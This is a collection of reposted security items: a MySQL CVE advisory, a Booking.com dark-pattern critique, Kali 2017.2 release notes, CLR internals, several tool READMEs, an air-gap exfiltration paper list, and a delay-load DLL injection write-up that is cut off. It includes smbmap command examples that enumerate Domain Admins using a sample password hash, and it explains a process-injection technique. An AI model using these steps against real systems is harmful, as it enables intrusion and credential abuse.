unspecified vulnerability (CPU Jan 2017) 1414423 - CVE-2017-3265 mysql: unsafe chmod/chown use in init script (CPU Jan 2017) 1414429 - CVE-2017-3291 mysql: unrestricted mysqld_safe's ledir (CPU Jan 2017) 1422119 - CVE-2017-3302 mysql: prepared statement handle use-after-free after disconnect 1431690 - CVE-2017-3305 mysql: incorrect enforcement of ssl-mode=REQUIRED in MySQL 5.5 and 5.6 1433010 - CVE-2016-5483 CVE-2017-3600 mariadb, mysql: Incorrect input validation allowing code execution via mysqldump 1443358 - CVE-2017-3308 mysql: Server: DML unspecified vulnerability (CPU Apr 2017) 1443359 - CVE-2017-3309 mysql: Server: Optimizer unspecified vulnerability (CPU Apr 2017) 1443363 - CVE-2017-3450 mysql: Server: Memcached unspecified vulnerability (CPU Apr 2017) 1443364 - CVE-2017-3452 mysql: Server: Optimizer unspecified vulnerability (CPU Apr 2017) 1443365 - CVE-2017-3453 mysql: Server: Optimizer unspecified vulnerability (CPU Apr 2017) 1443369 - CVE-2017-3456 mysql: Server: DML unspecified vulnerability (CPU Apr 2017) 1443376 - CVE-2017-3461 mysql: Server: Security: Privileges unspecified vulnerability (CPU Apr 2017) 1443377 - CVE-2017-3462 mysql: Server: Security: Privileges unspecified vulnerability (CPU Apr 2017) 1443378 - CVE-2017-3463 mysql: Server: Security: Privileges unspecified vulnerability (CPU Apr 2017) 1443379 - CVE-2017-3464 mysql: Server: DDL unspecified vulnerability (CPU Apr 2017) 1443386 - CVE-2017-3599 mysql: integer underflow in get_56_lenc_string() leading to DoS (CPU Apr 2017) 1472683 - CVE-2017-3633 mysql: Server: Memcached unspecified vulnerability (CPU Jul 2017) 1472684 - CVE-2017-3634 mysql: Server: DML unspecified vulnerability (CPU Jul 2017) 1472686 - CVE-2017-3636 mysql: Client programs unspecified vulnerability (CPU Jul 2017) 1472693 - CVE-2017-3641 mysql: Server: DML unspecified vulnerability (CPU Jul 2017) 1472703 - CVE-2017-3647 mysql: Server: Replication unspecified vulnerability (CPU Jul 2017) 1472704 - CVE-2017-3648 mysql: Server: Charsets unspecified vulnerability (CPU Jul 2017) 1472705 - CVE-2017-3649 mysql: Server: Replication unspecified vulnerability (CPU Jul 2017) 1472708 - CVE-2017-3651 mysql: Client mysqldump unspecified vulnerability (CPU Jul 2017) 1472710 - CVE-2017-3652 mysql: Server: DDL unspecified vulnerability (CPU Jul 2017) 1472711 - CVE-2017-3653 mysql: Server: DDL unspecified vulnerability (CPU Jul 2017) 1477575 - service start fails due to wrong selinux type of logfile 1482122 - Test case failure: /CoreOS/mysql/Regression/bz1149143-mysql-general-log-doesn-t-work-with-FIFO-file Sursa: https://mailinglist-archive.mojah.be/redhat-announce/2017-09/msg00048.php
-
How Booking.com manipulates you Published on September 17, 2017; tags: Misc Many websites and applications these days are designed to trick you into doing things that their creators want. Here are some examples from timewellspent.io: YouTube autoplays more videos to keep us from leaving. Instagram shows new likes one at a time, to keep us checking for more. Facebook wants to show whatever keeps us scrolling. Snapchat turns conversations into streaks we don’t want to lose. Our media turns events into breaking news to keep us watching. But one of the most manipulative websites I’ve ever come across is Booking.com, the large hotel search & booking service. If you ever used Booking.com, you probably noticed (and hopefully resisted!) some ways it nudges you to book whatever property you are looking at: Let’s see what’s going on here. Prices First, it tries to persuade you that the price is low. “Jackpot! This is the cheapest price you’ve seen in London for your dates!” Of course it is — this is literally the first price I am seeing for these days — so that statement is tautological. The first price I see will automatically be the lowest I will have seen, no matter how ridiculously high it’s going to be. The statement “This is the highest price you’ve seen in London for your dates!” would be just as valid. Likewise, the struck-through prices are there to anchor you and make the actual price seem like a great deal. The struck-through US$175 is before applying my 10% “genius” discount — ok, that’s fair. But where does the US$189 come from? Let’s hover over the price to get an explanation: I imagine most people will feel intimidated by the complex description, skip to the last sentence, and get the impression that “you get the same room for a lower price compared to other check-in dates”. (If this wasn’t the case, Booking.com’s marketing department would change the wording to make it so.) But what is it actually saying? If there is only one room of this type, then 90% of time there will be an appearance of a lucky deal. What you should be reading is “If I choose this, I am not a total loser”. And if there are 3 comparable room types with differential pricing, there is even less of a reason to feel good about this — you’ve successfully avoided the worst 3% of the offerings. Urgency Another way Booking.com manipulates you is by conveying the sense of urgency. “In high demand - only 3 rooms left on our site!” “33 other people looking now, according to our Booking.com travel scientists” (what?) “Last chance! Only 1 room left on our site!” And just to prove they are not kidding, they will show you something that you’ve missed already: But my favorite one is this red badge: Although it cannot be seen on the screenshot, the badge doesn’t appear right away when you open the page. Instead, it pops up one or two seconds later, making it seem like a realtime notification — an impression reinforced by the alarm clock icon. To be clear, it is not realtime, and there is no reason to delay its display other than to trick you: How much time has elapsed since the last booking doesn’t simply play on our irrational emotions. This is a valuable piece of information that can be used to estimate at what rate these rooms are being booked. By a Gott-like argument (see Algorithms to Live By for an excellent explanation), if the last booking was made 4 hours ago, you can estimate that a room is booked about every 8 hours. Plenty of time to relax and compare your options. If, on the other hand, the last booking happened just two seconds ago, you’d better not waste another second before entering your credit card number. Kudos to Booking for at least providing the actual information in a tooltip window (I wonder what regulations make them do that), but not all users will hover to read it, and even then, something that you experience (a badge popping up) will probably take precedence over what you later read. The “Someone just booked this” badge does not just make you worry that the room you are considering will soon be snatched; it also reassures you. If other people are actively booking this property, it must be good. Of course, the person who made a reservation 4 hours ago has not yet visited the hotel and so probably has little more knowledge than you. Their decision to book is probably to some extent influenced by the same red badge. This situation, where everyone relies on everyone else to have accurate information, is also well described in Algorithms to Live By. Reviews Instead of listening to people who have just booked the property but have not yet visited it, we should turn to those who have been there, right? That’s what reviews are for! But Booking.com managed to game the reviews, too. There are quite a few crappy hotels out there, especially on the cheaper end of the spectrum. These are the hotels you and I would want to avoid, but if we did, Booking would not make money on them. An extreme example is the hotel I’m currently staying at, New Union. From its Booking.com page you wouldn’t think there’s anything wrong with it, would you? If you spend enough time perusing that page, you’ll eventually stumble upon the “fine print”: “noise may be heard whilst the bar is open” is an understatement; the music is so loud that the floor in my room shakes very perceptibly, and the bar is open until late at night/early in the morning. And why is this warning hidden in the fine print instead of being a big red fucking badge? To be fair, this is more of the hotel’s fault than Booking’s. Also, I should have read the fine print. Or the reviews. But wait, I’ve read the reviews: What I didn’t realize skimming an overloaded webpage was that the reviews displayed on the main page had been cherry-picked. The full list of reviews is available from a separate page, e.g. Ratings Notice something interesting here: the first, moderately negative review, gives the place a rating of 7 out of 10, and the second review, probably as negative as it gets, gives it almost a 6. As a result, the overall rating of the property is high (7.6), and even the distribution of ratings does not look alarming: Unlike IMDB or Amazon, where you simply give a movie or product a number of stars, when you rate your stay on Booking.com, you evaluate it on several factors: location, cleanliness, facilities etc. But Booking.com doesn’t present individual ratings; it presents the average (like 7.1 or 5.8), and the average of averages (the overall rating of a property). It is unlikely that all factors will be bad simultaneously, but a problem in one of them may easily ruin your trip. A great location will not compensate for dirty sheets, but Booking.com thinks otherwise. What to do with all of this Frankly, I don’t think I am going to stop using Booking.com. I am not aware of any other service with a comparable number of properties and reviews. Instead, we need to be aware of all the ways Booking is trying to screw us over and try to counter them: Ignore urgency-provoking red text and anchoring struck-through prices. Do not rely on the magnitude of the ratings. I think it is still fine to use them as a sorting criterion. Do not read the cherry-picked reviews on the main page. Go to the review page (“Our guests’ experiences”) and sort the reviews from newest to oldest, to get an up-to-date and hopefully unbiased selection. Sursa: https://ro-che.info/articles/2017-09-17-booking-com-manipulation
-
Kali Linux 2017.2 Release September 20, 2017 dookie We are happy to announce the release of Kali Linux 2017.2, available now for your downloading pleasure. This release is a roll-up of all updates and fixes since our 2017.1 release in April. In tangible terms, if you were to install Kali from your 2017.1 ISO, after logging in to the desktop and running ‘apt update && apt full-upgrade’, you would be faced with something similiar to this daunting message: 1399 upgraded, 171 newly installed, 16 to remove and 0 not upgraded. Need to get 1,477 MB of archives. After this operation, 1,231 MB of additional disk space will be used. Do you want to continue? [Y/n] That would make for a whole lot of downloading, unpacking, and configuring of packages. Naturally, these numbers don’t tell the entire tale so read on to see what’s new in this release. New and Updated Packages in Kali 2017.2 In addition to all of the standard security and package updates that come to us via Debian Testing, we have also added more than a dozen new tools to the repositories, a few of which are listed below. There are some really nice additions so we encourage you to ‘apt install’ the ones that pique your interest and check them out. hurl – a useful little hexadecimal and URL encoder/decoder phishery – phishery lets you inject SSL-enabled basic auth phishing URLs into a .docx Word document ssh-audit – an SSH server auditor that checks for encryption types, banners, compression, and more apt2 – an Automated Penetration Testing Toolkit that runs its own scans or imports results from various scanners, and takes action on them bloodhound – uses graph theory to reveal the hidden or unintended relationships within Active Directory crackmapexec – a post-exploitation tool to help automate the assessment of large Active Directory networks dbeaver – powerful GUI database manager that supports the most popular databases, including MySQL, PostgreSQL, Oracle, SQLite, and many more brutespray – automatically attempts default credentials on discovered services On top of all the new packages, this release also includes numerous package updates, including jd-gui, dnsenum, edb-debugger, wpscan, watobo, burpsuite, and many others. To check out the full list of updates and additions, refer to the Kali changelog on our bug tracker. Ongoing Integration Improvements Beyond the new and updated packages in this release, we have also been working towards improving the overall integration of packages in Kali Linux. One area in particular is in program usage examples. Many program authors assume that their application will only be run in a certain manner or from a certain location. For example, the SMBmap application has a binary name of ‘smbmap’ but if you were to look at the usage example, you would see this: Examples: $ python smbmap.py -u jsmith -p password1 -d workgroup -H 192.168.0.1 $ python smbmap.py -u jsmith -p 'aad3b435b51404eeaad3b435b51404ee:da76f2c4c96028b7a6111aef4a50a94d' -H 172.16.0.20 $ python smbmap.py -u 'apadmin' -p 'asdf1234!' -d ACME -h 10.1.3.30 -x 'net group "Domain Admins" /domain' If you were a novice user, you might see these examples, try to run them verbatim, find that they don’t work, assume the tool doesn’t work, and move on. That would be a shame because smbmap is an excellent program so we have been working on fixing these usage discrepancies to help improve the overall fit and finish of the distribution. If you run ‘smbmap’ in Kali 2017.2, you will now see this output instead: Examples: $ smbmap -u jsmith -p password1 -d workgroup -H 192.168.0.1 $ smbmap -u jsmith -p 'aad3b435b51404eeaad3b435b51404ee:da76f2c4c96028b7a6111aef4a50a94d' -H 172.16.0.20 $ smbmap -u 'apadmin' -p 'asdf1234!' -d ACME -h 10.1.3.30 -x 'net group "Domain Admins" /domain' We hope that small tweaks like these will help reduce confusion to both veterans and newcomers and it’s something we will continue working towards as time goes on. Learn More About Kali Linux In the time since the release of 2017.1, we also released our first book, Kali Linux Revealed, in both physical and onlineformats. If you are interested in going far beyond the basics, really want to learn how Kali Linux works, and how you can leverage its many advanced features, we encourage you to check it out. Once you have mastered the material, you will have the foundation required to pursue the Kali Linux Certified Professional certification. Kali ISO Downloads, Virtual Machines and ARM Images The Kali Rolling 2017.2 release can be downloaded via our official Kali Download page. This release, we have also updated our Kali Virtual Images and Kali ARM Images downloads. As always, if you already have Kali installed and running to your liking, all you need to do in order to get up-to-date is run the following: apt update apt dist-upgrade reboot We hope you enjoy this fine release as much as we enjoyed making it! Sursa: https://www.kali.org/news/kali-linux-2017-2-release/
-
Managed object internals, Part 1. The layout Sergey TeplyakovMay 26, 2017 The layout of a managed object is pretty simple: a managed object contains instance data, a pointer to a meta-data (a.k.a. method table pointer) and a bag of internal information also known as an object header. The first time I’ve read about it, I’ve got a question: why the layout of an object is so weird? Why a managed reference points into the middle of an object and an object header is at a negative offset? What information is stored in the object header? When I started thinking about the layout and did a quick research, I’ve got few options: 1. JVM used a similar layout for their managed objects from the inception. It could sound a bit crazy today but remember that C# has one of the worst features of all times (a.k.a. array covariance) just because Java had it back in the day. And compared to that decision, reusing some ideas about the structure of an object doesn’t sound that unreasonable. 2. Object header can grow in size with no cross-cutting changes in the CLR. Object header holds some auxiliary information used by CLR and it is possible that CLR will require more information than a pointer size field. And indeed, .Net Compact Framework used in mobile phones has different headers for small and large objects (see WP7: CLR Managed Object overhead for more details). Desktop CLR never used this ability but it doesn’t mean that it is impossible in the future. 3. Cache line and other performance related characteristics. Chris Brumme -- one of the CLR architects, mentioned in the comment on his post “Value Types“ that cache friendliness is the very reason for the managed object layout. It is theoretically possible that due to cache line size (64 bytes) it will be more efficient to access fields that are closer to each other. This means that dereferencing method table pointer with the following access to some field should have some performance difference depending on the location of the field inside the object. I’ve spent some time trying to proof that this is still true for modern processors but was unable to get any benchmarks that showed the difference. After spending some time trying to validate my theories, I’ve contacted Vance Morrison asking this very question and got the following answer: current design was made with no particular perf considerations. So, the answer to the question – “Why the managed object’s layout is so weird?”, is simple: “historical reasons”. And, to be honest, I can see a logic for moving object header at a negative index to emphasize that this piece of data is an implementation detail of the CLR, the size of it can change in time, and it should not be inspected by a user. Now, it’s time to inspect the layout in more details. But before that, let’s think about, what extra information CLR can be associated with a managed object instance? Here are some ideas: · Special flags that GC can use to mark that an object is reachable from application roots. · Special flag that notifies GC that an object is pinned and should not be moved during garbage collection. · Hash code of a managed object (when a GetHashCode method is not overridden). · Critical section and other information used by a lock statement: thread that acquired the lock etc. Apart from instance state, CLR stores a lot of information associated with a type, like method table, interface maps, instance size and so on, but this is not relevant for our current discussion. IsMarked flag Managed object header is a multi-purpose chameleon that can be used for many different purposes. And you may think that the garbage collector (GC) uses a bit from the object header to mark that the object is references by a root and should be kept alive. This is a common misconception, and few very famous books are to blame (*). Namely “CLR via C#” by Jeffrey Richter, “Pro .NET Performance” by Sasha Goldstein at al and, definitely, some others. Instead of using the object header, the CLR authors decided to use one clever trick: the lowest bit of a method table pointer is used to store a flag during garbage collection that the object is reachable and should not be collected. Here is an actual implementation of ‘mark’ flag from the coreclr repo, file gc.cpp, lines 8974 (**): (**) Unfortunately, the gc.cpp file is so big that github refuses to analyze it. This means that I can’t add a hyperlink to a specific line of code. Managed pointers in a CLR heap are aligned on 4-byte or 8-byte address boundaries depending on a platform. This means that 2 or 3 bits of every pointer are always 0 and can be used for other purposes. The same trick is used by JVM and called ‘Compressed Oops’ – the feature that allows JVM to have 32 gigs heap size and still use 4 bytes for managed pointer. Technically speaking, even on a 32-bit platform there is 2 bits that can be used for flags. Based on a comment from the object.h file we can think that this is indeed the case and the second lowest bit of the method table pointer is used for pinning (to mark that the object should not be moved during compaction phase of garbage collection). Unfortunately, it is not clear, is true or not, because SetPinned/IsPinned methods from the gc.cpp (lines 3850-3859) are implemented based on a reserved bit from the object header and I was unable to find any code in the coreclr repo that actually sets the bit of the method table pointer. Next time we’ll discuss how locks are implemented and will check how expensive they are. Part 1: https://blogs.msdn.microsoft.com/seteplia/2017/05/26/managed-object-internals-part-1-layout/ Part 2: https://blogs.msdn.microsoft.com/seteplia/2017/09/06/managed-object-internals-part-2-object-header-layout-and-the-cost-of-locking/ Part 3: https://blogs.msdn.microsoft.com/seteplia/2017/09/12/managed-object-internals-part-3-the-layout-of-a-managed-array-3/ Part 4: https://blogs.msdn.microsoft.com/seteplia/2017/09/21/managed-object-internals-part-4-fields-layout/
-
- 1
-
-
CVE-2017-0785 PoC This is just a personal study based on the Android information leak vulnerability released by Armis. Further reading: https://www.armis.com/blueborne/ To run, be sure to have pybluez and pwntools installed. sudo apt-get install bluetooth libbluetooth-dev sudo pip install pybluez sudo pip install pwntools Sursa: https://github.com/ojasookert/CVE-2017-0785
-
- 1
-
-
Abstract— The continuous discovery of exploitable vulnerabilities in popular applications (e.g., document viewers), along with their heightening protections against control flow hijacking, has opened the door to an often neglected attack strategy— namely, data-only attacks. In this paper, we demonstrate the practicality of the threat posed by data-only attacks that harness the power of memory disclosure vulnerabilities. To do so, we introduce memory cartography, a technique that simplifies the construction of data-only attacks in a reliable manner. Specifically, we show how an adversary can use a provided memory mapping primitive to navigate through process memory at runtime, and safely reach security-critical data that can then be modified at will. We demonstrate this capability by using our cross-platform memory cartography framework implementation to construct data-only exploits against Internet Explorer and Chrome. The outcome of these exploits ranges from simple HTTP cookie leakage, to the alteration of the same origin policy for targeted domains, which enables the cross-origin execution of arbitrary script code. The ease with which we can undermine the security of modern browsers stems from the fact that although isolation policies (such as the same origin policy) are enforced at the script level, these policies are not well reflected in the underlying sandbox process models used for compartmentalization. This gap exists because the complex demands of today’s web functionality make the goal of enforcing the same origin policy through process isolation a difficult one to realize in practice, especially when backward compatibility is a priority (e.g., for support of cross-origin IFRAMEs). While fixing the underlying problems likely requires a major refactoring of the security architecture of modern browsers (in the long term), we explore several defenses, including global variable randomization, that can limit the power of the attacks presented herein. Download: https://www3.cs.stonybrook.edu/~mikepo/papers/xfu.eurosp17.pdf
-
osx-config-check Checks your OSX machine against various hardened configuration settings. You can specify your own preferred configuration baseline by supplying your own Hjson file instead of the provided one. Disclaimer The authors of this tool are not responsible if running it breaks stuff; disabling features of your operating system and applications may disrupt normal functionality. Once applied, the security configurations do not not guarantee security. You will still need to make good decisions in order to stay secure. The configurations will generally not help you if your computer has been previously compromised. Configurations come from sites like: drduh's OS X Security and Privacy Guide Usage You should download and run this application once for each OS X user account you have on your machine. Each user may be configured differently, and so each should be audited. Download this app using Git, GitHub Desktop, or the "download as zip" option offered by GitHub. If you choose the zip option, unarchive the zip file after. In the Terminal application, navigate to the directory that contains this app. You can use the cd command (see example below) to change directories. If you've downloaded the file to your "Downloads" directory, you might find the app here: cd ~/Downloads/osx-config-check If that directory doesn't exist because the folder you retrieved is named slightly different (such as 'osx-config-check-master' or 'osx-config-check-1.0.0'), you can always type in a portion of the directory name and hit the [TAB] key in Terminal to auto-complete the rest. Next run the app as follows: python app.py This will take you through a series of interactive steps that checks your machine's configuration, and offers to fix misconfigurations for you. Intermediate users and advanced users can also invoke various command-line arguments: Usage: python app.py [OPTIONS] OPTIONS: --debug-print Enables verbose output for debugging the tool. --report-only Only reports on compliance and does not offer to fix broken configurations. --disable-logs Refrain from creating a log file with the results. --disable-prompt Refrain from prompting user before applying fixes. --skip-sudo-checks Do not perform checks that require sudo privileges. --help -h Print this usage information. Sursa: https://github.com/kristovatlas/osx-config-check
-
Air-Gap Research Page By Dr. Mordechai Guri Cyber-Security Research Center Ben-Gurion University of the Negev, Israel email: gurim@post.bgu.ac.il (linkedin) aIR-Jumper (Optical) "aIR-Jumper: Covert Air-Gap Exfiltration/Infiltration via Security Cameras & Infrared (IR)" Mordechai Guri, Dima Bykhovsky, Yuval Elovici Paper: http://arxiv.org/abs/1709.05742 Video (infiltration): https://www.youtube.com/watch?v=auoYKSzdOj4 Video (exfiltration): https://www.youtube.com/watch?v=om5fNqKjj2M xLED (Optical) Mordechai Guri, Boris Zadov, Andrey Daidakulov, Yuval Elovici. "xLED: Covert Data Exfiltration from Air-Gapped Networks via Router LEDs" Paper: https://arxiv.org/abs/1706.01140 Or: http://cyber.bgu.ac.il/advanced-cyber/system/files/xLED-Router-Guri_0.pdf Demo video: https://www.youtube.com/watch?v=mSNt4h7EDKo AirHopper (Electromagnetic) Mordechai Guri, Gabi Kedma, Assaf Kachlon, and Yuval Elovici. "AirHopper: Bridging the air-gap between isolated networks and mobile phones using radio frequencies." In Malicious and Unwanted Software: The Americas (MALWARE), 2014 9th International Conference on, pp. 58-67. IEEE, 2014. Guri, Mordechai, Matan Monitz, and Yuval Elovici. "Bridging the Air Gap between Isolated Networks and Mobile Phones in a Practical Cyber-Attack." ACM Transactions on Intelligent Systems and Technology (TIST) 8, no. 4 (2017): 50. Demo video: https://www.youtube.com/watch?v=2OzTWiGl1rM&t=20s BitWhisper (Thermal) Mordechai Guri, Matan Monitz, Yisroel Mirski, and Yuval Elovici. "Bitwhisper: Covert signaling channel between air-gapped computers using thermal manipulations." In Computer Security Foundations Symposium (CSF), 2015 IEEE 28th, pp. 276-289. IEEE, 2015. Demo video: https://www.youtube.com/watch?v=EWRk51oB-1Y&t=15s GSMem (Electromagnetic) Mordechai Guri, Assaf Kachlon, Ofer Hasson, Gabi Kedma, Yisroel Mirsky, and Yuval Elovici. "GSMem: Data exfiltration from air-gapped computers over gsm frequencies." In 24th USENIX Security Symposium (USENIX Security 15), pp. 849-864. 2015. Demo video: https://www.youtube.com/watch?v=RChj7Mg3rC4 Fansmitter (Acoustic) Mordechai Guri, Yosef Solewicz, Andrey Daidakulov, and Yuval Elovici. "Fansmitter: Acoustic Data Exfiltration from (Speakerless) Air-Gapped Computers." arXiv preprint arXiv:1606.05915 (2016). Demo video: https://www.youtube.com/watch?v=v2_sZIfZkDQ DiskFiltration (Acoustic) Mordechai Guri,Yosef Solewicz, Andrey Daidakulov, Yuval Elovici. "Acoustic Data Exfiltration from Speakerless Air-Gapped Computers via Covert Hard-Drive Noise (‘DiskFiltration’)". European Symposium on Research in Computer Security (ESORICS 2017) pp 98-115 Mordechai Guri, Yosef Solewicz, Andrey Daidakulov, and Yuval Elovici. "DiskFiltration: Data Exfiltration from Speakerless Air-Gapped Computers via Covert Hard Drive Noise." arXiv preprint arXiv:1608.03431 (2016). Demo video: https://www.youtube.com/watch?v=H7lQXmSLiP8 USBee (Electromagnetic) Mordechai Guri, Matan Monitz, and Yuval Elovici. "USBee: Air-Gap Covert-Channel via Electromagnetic Emission from USB." arXiv preprint arXiv:1608.08397 (2016). Demo video: https://www.youtube.com/watch?v=E28V1t-k8Hk LED-it-GO (Optical) Mordechai Guri, Boris Zadov, Yuval Elovici. "LED-it-GO: Leaking (A Lot of) Data from Air-Gapped Computers via the (Small) Hard Drive LED". Detection of Intrusions and Malware, and Vulnerability Assessment - 14th International Conference, DIMVA 2017: 161-184 Mordechai Guri, Boris Zadov, Eran Atias, and Yuval Elovici. "LED-it-GO: Leaking (a lot of) Data from Air-Gapped Computers via the (small) Hard Drive LED." arXiv preprint arXiv:1702.06715 (2017). Demo video: https://www.youtube.com/watch?v=4vIu8ld68fc VisiSploit (Optical) Mordechai Guri, Ofer Hasson, Gabi Kedma, and Yuval Elovici. "An optical covert-channel to leak data through an air-gap." In Privacy, Security and Trust (PST), 2016 14th Annual Conference on, pp. 642-649. IEEE, 2016. Mordechai Guri, Ofer Hasson, Gabi Kedma, and Yuval Elovici. "VisiSploit: An Optical Covert-Channel to Leak Data through an Air-Gap." arXiv preprint arXiv:1607.03946 (2016). Attachment: PDF icon xLED-Router-Guri.pdf Link: http://cyber.bgu.ac.il/advanced-cyber/airgap
-
The information security world is rich with information. From reviewing logs to analyzing malware, information is everywhere and in vast quantities, more than the workforce can cover. Artificial intelligence is a field of study that is adept at applying intelligence to vast amounts of data and deriving meaningful results. In this book, we will cover machine learning techniques in practical situations to improve your ability to thrive in a data driven world. With clustering, we will explore grouping items and identifying anomalies. With classification, we’ll cover how to train a model to distinguish between classes of inputs. In probability, we’ll answer the question “What are the odds?” and make use of the results. With deep learning, we’ll dive into the powerful biology inspired realms of AI that power some of the most effective methods in machine learning today. The Cylance Data Science team consists of experts in a variety of fields. Contributing members from this team for this book include Brian Wallace, a security researcher turned data scientist with a propensity for building tools that merge the worlds of information security and data science. Sepehr Akhavan-Masouleh is a data scientist who works on the application of statistical and machine learning models in cyber-security with a Ph.D from University of California, Irvine. Andrew Davis is a neural network wizard wielding a Ph.D in computer engineering from University of Tennessee. Mike Wojnowicz is a data scientist with a Ph.D. from Cornell University who enjoys developing and deploying large-scale probabilistic models due to their interpretability. Data scientist John H. Brock researches applications of machine learning to static malware detection and analysis, holds an M.S. in computer science from University of California, Irvine, and can usually be found debugging Lovecraftian open source code while mumbling to himself about the virtues of unit testing. Download: http://defense.ballastsecurity.net/static/IntroductionToArtificialIntelligenceForSecurityProfessionals_Cylance.pdf
-
No Coin No coin is a tiny browser extension aiming to block coin miners such as Coinhive. You can grab the extension from: Chrome Web Store FireFox Add-on (coming soon) Why? Even though I think using coin mining in browser to monetize content is a great idea, abusing it is not. Some websites are running it during the entire browsing session which results in high consumption of your computers resources. I do believe that using it occasionally such as for the proof of work of a captcha is OK. But for an entire browsing session, the user should have the choice to opt-in which is the aim of this extension. Why not just block the URLs in an adblocker? The idea was to keep it separate from adblocking. Coin mining in the browser is a different issue. Where ads are tracking you and visually interfering with your browsing experience, coin mining, if abused, is eating your computer resources resulting in slow downs (from high CPU usage) and excessive power consumption. You might be OK with that and not with ads, or vice versa. Or you might just want to keep ads blocked entirely and just enable the coin mining script for a minute to pass a Captcha. That's why I believe having a separate extension is useful. How does it work? The extension is simply blocking a list of blacklisted domains in blacklist.txt. Clicking on the icon will display you a button to pause/unpause No Coin. If you are aware of any scripts or services that provide coin mining the browser, please submit a PR. Contribute Contributions are welcome! Don't hesitate to submit bug fixes, improvements and new features. Regarding new features, please have a look at the issues first. If a feature you whish to work on is not listed in here, you might want to add an issue first before starting to work on a PR. Made by Rafael Keramidas (keraf [at] protonmail [dot] com - @iamkeraf - ker.af). Image used for logo by Sandro Pereira. Sursa: https://github.com/keraf/NoCoin
-
- 1
-
-
Chiar exista oameni care citesc "Terms and conditions"? Sau "Privacy policy".
-
Abusing Delay Load DLLs for Remote Code Injection Sep 19th, 2017 I always tell myself that I’ll try posting more frequently on my blog, and yet here I am, two years later. Perhaps this post will provide the necessary motiviation to conduct more public research. I do love it. This post details a novel remote code injection technique I discovered while playing around with delay loading DLLs. It allows for the injection of arbitrary code into arbitrary remote, running processes, provided that they implement the abused functionality. To make it abundantly clear, this is not an exploit, it’s simply another strategy for migrating into other processes. Modern code injection techniques typically rely on a variation of two different win32 API calls: CreateRemoteThread and NtQueueApc. Endgame recently put out a great article[0] detailing ten various methods of process injection. While not all of them allow for injection into remote processes, particularly those already running, it does detail the most common, public variations. This strategy is more akin to inline hooking, though we’re not touching the IAT and we don’t require our code to already be in the process. There are no calls to NtQueueApc or CreateRemoteThread, and no need for thread or process suspension. There are some limitations, as with anything, which I’ll detail below. Delay Load DLL Delay loading is a linker strategy that allows for the lazy loading of DLLs. Executables commonly load all necessary dynamically linked libraries at runtime and perform the IAT fix-ups then. Delay loading, however, allows for these libraries to be lazy loaded at call time, supported by a pseudo IAT that’s fixed-up on first call. This process can be better illuminated by the following, decades old figure below: This image comes from a great Microsoft article released in 1998 [1] that describes the strategy quite well, but I’ll attempt to distill it here. Portable executables contain a data directory named IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT, which you can see using dumpbin /imports or using windbg. The structure of this entry is described in delayhlp.cpp, included with the WinSDK: 1 2 3 4 5 6 7 8 9 10 11 struct InternalImgDelayDescr { DWORD grAttrs; // attributes LPCSTR szName; // pointer to dll name HMODULE * phmod; // address of module handle PImgThunkData pIAT; // address of the IAT PCImgThunkData pINT; // address of the INT PCImgThunkData pBoundIAT; // address of the optional bound IAT PCImgThunkData pUnloadIAT; // address of optional copy of original IAT DWORD dwTimeStamp; // 0 if not bound, // O.W. date/time stamp of DLL bound to (Old BIND) }; The table itself contains RVAs, not pointers. We can find the delay directory offset by parsing the file header: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 0:022> lm m explorer start end module name 00690000 00969000 explorer (pdb symbols) 0:022> !dh 00690000 -f File Type: EXECUTABLE IMAGE FILE HEADER VALUES [...] 68A80 [ 40] address [size] of Load Configuration Directory 0 [ 0] address [size] of Bound Import Directory 1000 [ D98] address [size] of Import Address Table Directory AC670 [ 140] address [size] of Delay Import Directory 0 [ 0] address [size] of COR20 Header Directory 0 [ 0] address [size] of Reserved Directory The first entry and it’s delay linked DLL can be seen in the following: 1 2 3 4 5 0:022> dd 00690000+ac670 l8 0073c670 00000001 000ac7b0 000b24d8 000b1000 0073c680 000ac8cc 00000000 00000000 00000000 0:022> da 00690000+000ac7b0 0073c7b0 "WINMM.dll" This means that WINMM is dynamically linked to explorer.exe, but delay loaded, and will not be loaded into the process until the imported function is invoked. Once loaded, a helper function fixes up the psuedo IAT by using GetProcAddress to locate the desired function and patching the table at runtime. The pseudo IAT referenced is separate from the standard PE IAT; this IAT is specifically for the delay load functions, and is referenced from the delay descriptor. So for example, in WINMM.dll’s case, the pseudo IAT for WINMM is at RVA 000b1000. The second delay descriptor entry would have a separate RVA for its pseudo IAT, and so on and so forth. Using WINMM as our delay example, explorer imports one function from it, PlaySoundW. In my particular running instance, it has not been invoked, so the pseudo IAT has not been fixed up yet. We can see this by dumping it’s pseudo IAT entry: 1 2 3 0:022> dps 00690000+000b1000 l2 00741000 006dd0ac explorer!_imp_load__PlaySoundW 00741004 00000000 Each DLL entry is null terminated. The above pointer shows us that the existing entry is merely a springboard thunk within the Explorer process. This takes us here: 1 2 3 4 5 6 7 8 9 10 0:022> u explorer!_imp_load__PlaySoundW explorer!_imp_load__PlaySoundW: 006dd0ac b800107400 mov eax,offset explorer!_imp__PlaySoundW (00741000) 006dd0b1 eb00 jmp explorer!_tailMerge_WINMM_dll (006dd0b3) explorer!_tailMerge_WINMM_dll: 006dd0b3 51 push ecx 006dd0b4 52 push edx 006dd0b5 50 push eax 006dd0b6 6870c67300 push offset explorer!_DELAY_IMPORT_DESCRIPTOR_WINMM_dll (0073c670) 006dd0bb e8296cfdff call explorer!__delayLoadHelper2 (006b3ce9) The tailMerge function is a linker-generated stub that’s compiled in per-DLL, not per function. The __delayLoadHelper2 function is the magic that handles the loading and patching of the pseudo IAT. Documented in delayhlp.cpp, this function handles calling LoadLibrary/GetProcAddress and patching the pseudo IAT. As a demonstration of how this looks, I compiled a binary that delay links dnslib. Here’s the process of resolution of DnsAcquireContextHandle: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 0:000> dps 00060000+0001839c l2 0007839c 000618bd DelayTest!_imp_load_DnsAcquireContextHandle_W 000783a0 00000000 0:000> bp DelayTest!__delayLoadHelper2 0:000> g ModLoad: 753e0000 7542c000 C:\Windows\system32\apphelp.dll Breakpoint 0 hit [...] 0:000> dd esp+4 l1 0024f9f4 00075ffc 0:000> dd 00075ffc l4 00075ffc 00000001 00010fb0 000183c8 0001839c 0:000> da 00060000+00010fb0 00070fb0 "DNSAPI.dll" 0:000> pt 0:000> dps 00060000+0001839c l2 0007839c 74dfd0fc DNSAPI!DnsAcquireContextHandle_W 000783a0 00000000 Now the pseudo IAT entry has been patched up and the correct function is invoked on subsequent calls. This has the additional side effect of leaving the 